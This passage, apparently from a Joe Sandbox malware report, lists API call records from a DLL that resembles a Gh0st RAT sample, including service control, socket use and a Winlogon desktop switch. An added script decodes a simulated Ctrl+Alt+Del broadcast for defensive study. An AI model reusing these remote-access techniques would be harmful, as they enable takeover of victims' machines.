                                                          • lstrcpyW.KERNEL32(?,00000000,00000000), ref: 10024AD4
                                                          • WTSFreeMemory.WTSAPI32(?), ref: 10024ADF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000200,?,000000FF,00000000,00000104,00000000,00000000,?), ref: 10024B18
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 10024B2B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$ByteCharFreeInformationMemoryMultiQuerySessionWide
                                                          • String ID:
                                                          • API String ID: 2394411120-0
                                                          • Opcode ID: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                          • Instruction ID: 955f71c2f156101e58c3954c60e55afc292817027518ed639cbb0e0337d6e5ae
                                                          • Opcode Fuzzy Hash: 1b9fc8bdf879ab64dffc80c6641e543ed05e3d8dc88176b00b51a123d4ec99f8
                                                          • Instruction Fuzzy Hash: C61165751183417BE310CB58CC45FEB73E8BBC8B10F044A1CF659962C0E674A5088B62
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: fgets$fclosefopenstrncpy
                                                          • String ID:
                                                          • API String ID: 2591305919-0
                                                          • Opcode ID: 77209377daff59115616ab6e289239f370c7568974e9fd3ecc01b251fc87ae2e
                                                          • Instruction ID: 6ad302e1cb297ef1bbbfed3f052a12079a62e59ca5e52546dd175ba7e75c563e
                                                          • Opcode Fuzzy Hash: 77209377daff59115616ab6e289239f370c7568974e9fd3ecc01b251fc87ae2e
                                                          • Instruction Fuzzy Hash: 4401F2726002257BE301D76CED81BDB37DCEF88355FD50524F988D6240EB79DA8486A2
                                                          APIs
                                                          • #858.MFC42(-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119AB
                                                          • #6874.MFC42(0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119B4
                                                          • #6874.MFC42(0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119C5
                                                          • #6874.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119D6
                                                          • #800.MFC42(00000020,0000002D,0000002F,-00000002,00000002,00000000,00000000,10098778,000000FF,10011D9B,?,?,100FB4F0,100FA644), ref: 100119E7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                           • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #6874$#800#858
                                                          • String ID:
                                                          • API String ID: 833685189-0
                                                          • Opcode ID: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                          • Instruction ID: 01b43e94da0ea2eb4e39674b02d587f3c921b09ce4ba7a4e708dea5c2d38b77a
                                                          • Opcode Fuzzy Hash: 8fba9978fbcacef4305ec62f9d20de837d23ef3cff7f8932171e12680254217a
                                                          • Instruction Fuzzy Hash: A401F471208B82AAC704CF54EA15F9AFBD5EB90B60F00063EF0A5476D1DB74E9088392
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,00000000,1001FB22,1011EC82,?,?,?,?,?,?,?,?), ref: 1001FEE7
                                                          • OpenServiceA.ADVAPI32(00000000,?,00020000,?,?,?,?,?,?,?,?), ref: 1001FF00
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 1001FF0B
                                                          Yara matches
                                                          Similarity
                                                          • API ID: OpenService$CloseHandleManager
                                                          • String ID:
                                                          • API String ID: 4136619037-0
                                                          • Opcode ID: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                          • Instruction ID: efb21d9ce1343172679c2ebe97ca72b077adbb798532605da40d3010ccc8a93c
                                                          • Opcode Fuzzy Hash: 9b0dc5b076fce1cf9a16b774a2a7847931855da1db67cd2e176fee473d4c4fbc
                                                          • Instruction Fuzzy Hash: 30E09236219231A7E2217729BC88FDB67A8EFD9791F0B0156F608DA190C6A0D88245E8
                                                          APIs
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002,?,10028552), ref: 10027267
                                                          • OpenServiceA.ADVAPI32(00000000,?,00010010,?,00000065), ref: 10027280
                                                          • StartServiceA.ADVAPI32(00000000,00000000,00000000,?,00000065), ref: 10027297
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 1002729E
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,00000065), ref: 100272A1
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandleOpen$ManagerStart
                                                          • String ID:
                                                          • API String ID: 1485051382-0
                                                          • Opcode ID: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                          • Instruction ID: a991dfd3618a091cf8bced06e1e14c92db115e9186b32fce010f6c8dd9d2edbc
                                                          • Opcode Fuzzy Hash: de2cff0e2183aa8c2048c1ea4d6f503d246575146b3d388905ddcafbe7147248
                                                          • Instruction Fuzzy Hash: 1AE09B35256621BBF22167149CC5FAB2678FB8DBD0F150205F608961C0CB609C0141AD
                                                          APIs
                                                          • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                          • CancelIo.KERNEL32(?), ref: 10004F57
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                          • closesocket.WS2_32(?), ref: 10004F73
                                                          • SetEvent.KERNEL32(?), ref: 10004F80
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                          • String ID:
                                                          • API String ID: 1486965892-0
                                                          • Opcode ID: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                          • Instruction ID: 7b5b089ba35ea6fa801320ef26441ee9f6e0eb5430616a3962164302b2279ec7
                                                          • Opcode Fuzzy Hash: 6626a22e340417a29348b83b411036a0a6be5876ad5ce8627d14265979501e30
                                                          • Instruction Fuzzy Hash: 81F01275214711AFE6248F64CC88FD777A8BF45711F108B1DF6AE462D0CB70A4488755
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,00000000,00000000), ref: 10005B96
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005B9D
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$WideCharToMultiByte
                                                          • API String ID: 2574300362-2634761684
                                                          • Opcode ID: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                          • Instruction ID: 11a70ebfe6614348c4627575f714f8bac5bc37e03cfb6a5d127c6c7937c6bce2
                                                          • Opcode Fuzzy Hash: 3f2dff838d6c50b6e35792f9c3f23f1c7ba8e3bb5a943dbf87fe4b46237b9eb9
                                                          • Instruction Fuzzy Hash: 2541257250421A8FDB18CE2CC8549AFBBD5FBC4354F154A2DF9A6D3280DA70AD0ACB91
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100108E8
                                                          • Sleep.KERNEL32(000004D2), ref: 1001098C
                                                            • Part of subcall function 10010790: CloseHandle.KERNEL32(00000000), ref: 10010893
                                                          • DeleteFileA.KERNEL32(?), ref: 1001094D
                                                            • Part of subcall function 10010790: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100107C2
                                                            • Part of subcall function 10010790: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10010837
                                                            • Part of subcall function 10010790: GetFileSize.KERNEL32(00000000,00000000), ref: 10010846
                                                            • Part of subcall function 10010790: #823.MFC42(00000000), ref: 1001084F
                                                            • Part of subcall function 10010790: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10010862
                                                            • Part of subcall function 10010790: #825.MFC42(00000000), ref: 1001088A
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$DirectorySystem$#823#825CloseCreateDeleteHandleReadSizeSleep
                                                          • String ID: .key
                                                          • API String ID: 3115437274-343438762
                                                          • Opcode ID: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                          • Instruction ID: 6c8f07c80318120aef5ae7d44ab656afb01d193eb1c0889538d79381634ba695
                                                          • Opcode Fuzzy Hash: a96574d81c46762344fc3343623d057d93ebf2ababc3c40e8b4745195a2ba852
                                                          • Instruction Fuzzy Hash: 1E210775B046540BE719D634889076A7BC5FBC1330F58031AF6978B2C2CEF898888755
                                                          APIs
                                                          • SHGetSpecialFolderPathA.SHELL32 ref: 10007877
                                                          • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 100078ED
                                                          • CloseHandle.KERNEL32(00000000), ref: 10007917
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateFileFolderHandlePathSpecial
                                                          • String ID: p
                                                          • API String ID: 3113538180-2181537457
                                                          • Opcode ID: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                          • Instruction ID: fb9301c769810b0d049b01ddbf7940714647d0c15556b6550ef7852ede3c4a13
                                                          • Opcode Fuzzy Hash: 5da1870f2322d6a31bcdac28cb17ebf9f43366c6ecd2797be473c450de5ccda1
                                                          • Instruction Fuzzy Hash: CB210A716006041FE718CA389C46BEB76C5FBC4330F588B2DF96ACB2D1DAF489098750
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutWrite), ref: 1000141E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001425
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutOpen), ref: 100014C9
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014D2
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutPrepareHeader), ref: 100014E2
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014E5
                                                            • Part of subcall function 100014B0: LoadLibraryA.KERNEL32(WINMM.dll,waveOutGetNumDevs), ref: 100014F5
                                                            • Part of subcall function 100014B0: GetProcAddress.KERNEL32(00000000), ref: 100014F8
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: WINMM.dll$waveOutWrite
                                                          • API String ID: 2574300362-665518901
                                                          • Opcode ID: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                          • Instruction ID: 94ba89aa586d5954ea77ca1480e0960dd09743874461cbc46f4ab6b518109010
                                                          • Opcode Fuzzy Hash: 4a4c6bc64acc4bfc1f0c5e94051bfa256714ece8f52ffe926b99e450b8b27139
                                                          • Instruction Fuzzy Hash: C211A0762043048FEB08DF68D8C89A6BBE5FB88380B15855DFE468B346DB71EC01DB20
                                                          APIs
                                                          • SetFilePointer.KERNEL32(?,?,?,00000000,?,?,00000065,?,00000001,00000001,00000001), ref: 10009DAA
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000065,?,00000001,00000001,00000001), ref: 10009DC6
                                                          • SetFilePointer.KERNEL32 ref: 10009DE4
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Pointer$Write
                                                          • String ID: p
                                                          • API String ID: 3847668363-2181537457
                                                          • Opcode ID: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                          • Instruction ID: 1a9338856e1de5b0d7c3f8fb7aa3c1ae0f192f66fa92f10234f7d2b8d6558fe2
                                                          • Opcode Fuzzy Hash: aa322e81eecda5844740ab48266e82d2f9faeacbe78758d31681d1f169d9bd49
                                                          • Instruction Fuzzy Hash: 811127B5608341ABE210DB28CC85F9BB7E9FBD8714F108A0CF99893280D674A9058BA1
                                                          APIs
                                                            • Part of subcall function 10001B80: InitializeCriticalSection.KERNEL32(00000001,?,100048DA,00000000), ref: 10001B98
                                                          • WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateCriticalEventInitializeSectionStartup
                                                          • String ID: a$m
                                                          • API String ID: 1327880603-1958708294
                                                          • Opcode ID: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                          • Instruction ID: fb24ae0377e714457c16f4a52ba150758387226036423692d2cdc97d3624b5ca
                                                          • Opcode Fuzzy Hash: e82e673a30c8e1feecafb6a2e90b74171136679baf06e6cd822636bf2ff756d4
                                                          • Instruction Fuzzy Hash: 87118B741087809EE321DB28C856BD6BBE4BF19B50F048A5DE4EE472C1DBB96008CB23
                                                          APIs
                                                          • #823.MFC42(00000014,0036EE80,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BA4,?), ref: 100251B7
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 100251DB
                                                          • wsprintfA.USER32 ref: 10025201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823GlobalMemoryStatuswsprintf
                                                          • String ID: @
                                                          • API String ID: 1983843647-2766056989
                                                          • Opcode ID: 9b615574f2840556ce8496ca6902c3105b99c888ccf645b6b1d9e367ae7dfecd
                                                          • Instruction ID: d3956e48529f39fac3fb667b05af59f770880b9a4c77528690d984d1b3a31aaa
                                                          • Opcode Fuzzy Hash: 9b615574f2840556ce8496ca6902c3105b99c888ccf645b6b1d9e367ae7dfecd
                                                          • Instruction Fuzzy Hash: 5EF082B96003106BE3109B1CDC45B9B7A95FBC0340F444838F94997351D634A91846E7
                                                          APIs
                                                          • #823.MFC42(00000014,76730450,00000000,?,?,?,?,?,?,?,?,?,?,?,10028BC0,00000000), ref: 10025D57
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 10025D7B
                                                          • wsprintfA.USER32 ref: 10025DA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823GlobalMemoryStatuswsprintf
                                                          • String ID: @
                                                          • API String ID: 1983843647-2766056989
                                                          • Opcode ID: 9ed444c80c647ea363146e938ab666fc6b212671693a0512f94a68165d732f8d
                                                          • Instruction ID: 43ad135ee27f5122673a5426b71d841963d21037910a495e5e6c48606e3b34eb
                                                          • Opcode Fuzzy Hash: 9ed444c80c647ea363146e938ab666fc6b212671693a0512f94a68165d732f8d
                                                          • Instruction Fuzzy Hash: 14F0A7B96003106FE3109B1CDC45B9B7B95FBC0350F448839F949D7361D534E91846E7
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 1002C581
                                                          • GetThreadDesktop.USER32(00000000,?,100175AC), ref: 1002C588
                                                            • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                            • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                          • PostMessageA.USER32(0000FFFF,00000312,00000000,002E0003), ref: 1002C5B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Thread$AddressCurrentDesktopLibraryLoadMessagePostProc
                                                          • String ID: Winlogon
                                                          • API String ID: 133172028-744610081
                                                          • Opcode ID: bd120ed92d315bd0790b541289a442660de5a15ef51d2611e8616a85a95fdbe7
                                                          • Instruction ID: f8fc29b68548e4c816e3190044c4a6e36e92d202cca53509085fc4ea7855aff1
                                                          • Opcode Fuzzy Hash: bd120ed92d315bd0790b541289a442660de5a15ef51d2611e8616a85a95fdbe7
                                                          • Instruction Fuzzy Hash: C2E08676E41A7417FA6167B87D4AFDA32089F10740F850270F50999582E654FB8141D5
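The record above lists GetCurrentThreadId, GetThreadDesktop, a dynamically resolved OpenDesktopA, the string "Winlogon" and PostMessageA(0000FFFF, 00000312, 00000000, 002E0003). Those four PostMessageA arguments decode to HWND_BROADCAST, WM_HOTKEY, and an lParam whose low word is MOD_ALT|MOD_CONTROL and whose high word is VK_DELETE: a broadcast Ctrl+Alt+Del hotkey, posted after switching to the Winlogon desktop. This is consistent with the Ctrl+Alt+Del simulation routine found in public Gh0st RAT source. The script below is an added illustration written for this page, not code from the sample, from Joe Sandbox or from Gh0st; it only unpacks the constants the report already shows, and the function and variable names are the author's own.

```python
"""Decode the PostMessageA call the sandbox recorded at ref 1002C5B4.

Added example for this report page. The constants come from winuser.h; the
call arguments are copied from the function record above. Names such as
classify_post_message are this example's own, not the sample's.
"""

HWND_BROADCAST = 0xFFFF
WM_HOTKEY = 0x0312

# Modifier bits carried in the low word of WM_HOTKEY's lParam.
MOD_FLAGS = {0x0001: "MOD_ALT", 0x0002: "MOD_CONTROL", 0x0004: "MOD_SHIFT", 0x0008: "MOD_WIN"}
# Small subset of virtual-key codes; unknown codes are printed numerically.
VK_NAMES = {0x09: "VK_TAB", 0x1B: "VK_ESCAPE", 0x2E: "VK_DELETE", 0x73: "VK_F4"}


def decode_hotkey_lparam(lparam: int) -> tuple[list[str], str]:
    """Split a WM_HOTKEY lParam into (modifier names, virtual-key name).

    Layout per winuser.h: LOWORD = modifier flags, HIWORD = virtual-key code.
    """
    mods_word = lparam & 0xFFFF
    vk = (lparam >> 16) & 0xFFFF
    mods = [name for bit, name in sorted(MOD_FLAGS.items()) if mods_word & bit]
    return mods, VK_NAMES.get(vk, f"VK_{vk:#04x}")


def classify_post_message(hwnd: int, msg: int, wparam: int, lparam: int) -> str:
    """Describe a PostMessage call as the sandbox lists it (hwnd, msg, wParam, lParam).

    Only WM_HOTKEY is decoded; the Ctrl+Alt+Del broadcast gets an explicit tag
    because it is the secure attention sequence and is rarely legitimate from a DLL.
    """
    if msg != WM_HOTKEY:
        return f"msg={msg:#06x} (not WM_HOTKEY)"
    mods, vk = decode_hotkey_lparam(lparam)
    target = "HWND_BROADCAST" if hwnd == HWND_BROADCAST else f"hwnd={hwnd:#x}"
    desc = f"WM_HOTKEY to {target}: {'+'.join(mods)}+{vk}"
    if hwnd == HWND_BROADCAST and set(mods) == {"MOD_ALT", "MOD_CONTROL"} and vk == "VK_DELETE":
        return desc + " [simulated Ctrl+Alt+Del, secure attention sequence]"
    return desc


# Arguments exactly as printed in the record for PostMessageA.USER32, ref 1002C5B4.
REPORTED_CALL = (0x0000FFFF, 0x00000312, 0x00000000, 0x002E0003)

if __name__ == "__main__":
    print(classify_post_message(*REPORTED_CALL))
```

The desktop switch matters for interpretation: hotkeys registered by Winlogon live on the Winlogon desktop, so the broadcast only reaches them if the posting thread has first attached to that desktop, which is what the OpenDesktopA resolution and the "Winlogon" string in this record point to. Triggering the secure attention sequence from a loaded DLL is a strong behavioural indicator on its own, independent of the family attribution.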
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: CreateEventA$KERNEL32.dll
                                                          • API String ID: 2574300362-2476775342
                                                          • Opcode ID: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                          • Instruction ID: 81657b418f3b05921348bdbd49973478ffcbca97394684bddc953fa459c75907
                                                          • Opcode Fuzzy Hash: 469b438b5aded452e172ac3230856e7048f68a61c6940f547f20e5805d7e4c6b
                                                          • Instruction Fuzzy Hash: 6CE08C756403206BE360DFA89C49F867A98EF48701F04881EF349E7281CAB0A840CB68
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,CloseHandle,00000000,1000F45B,00000000,00000000,1001DDE5), ref: 10010A23
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10010A2A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
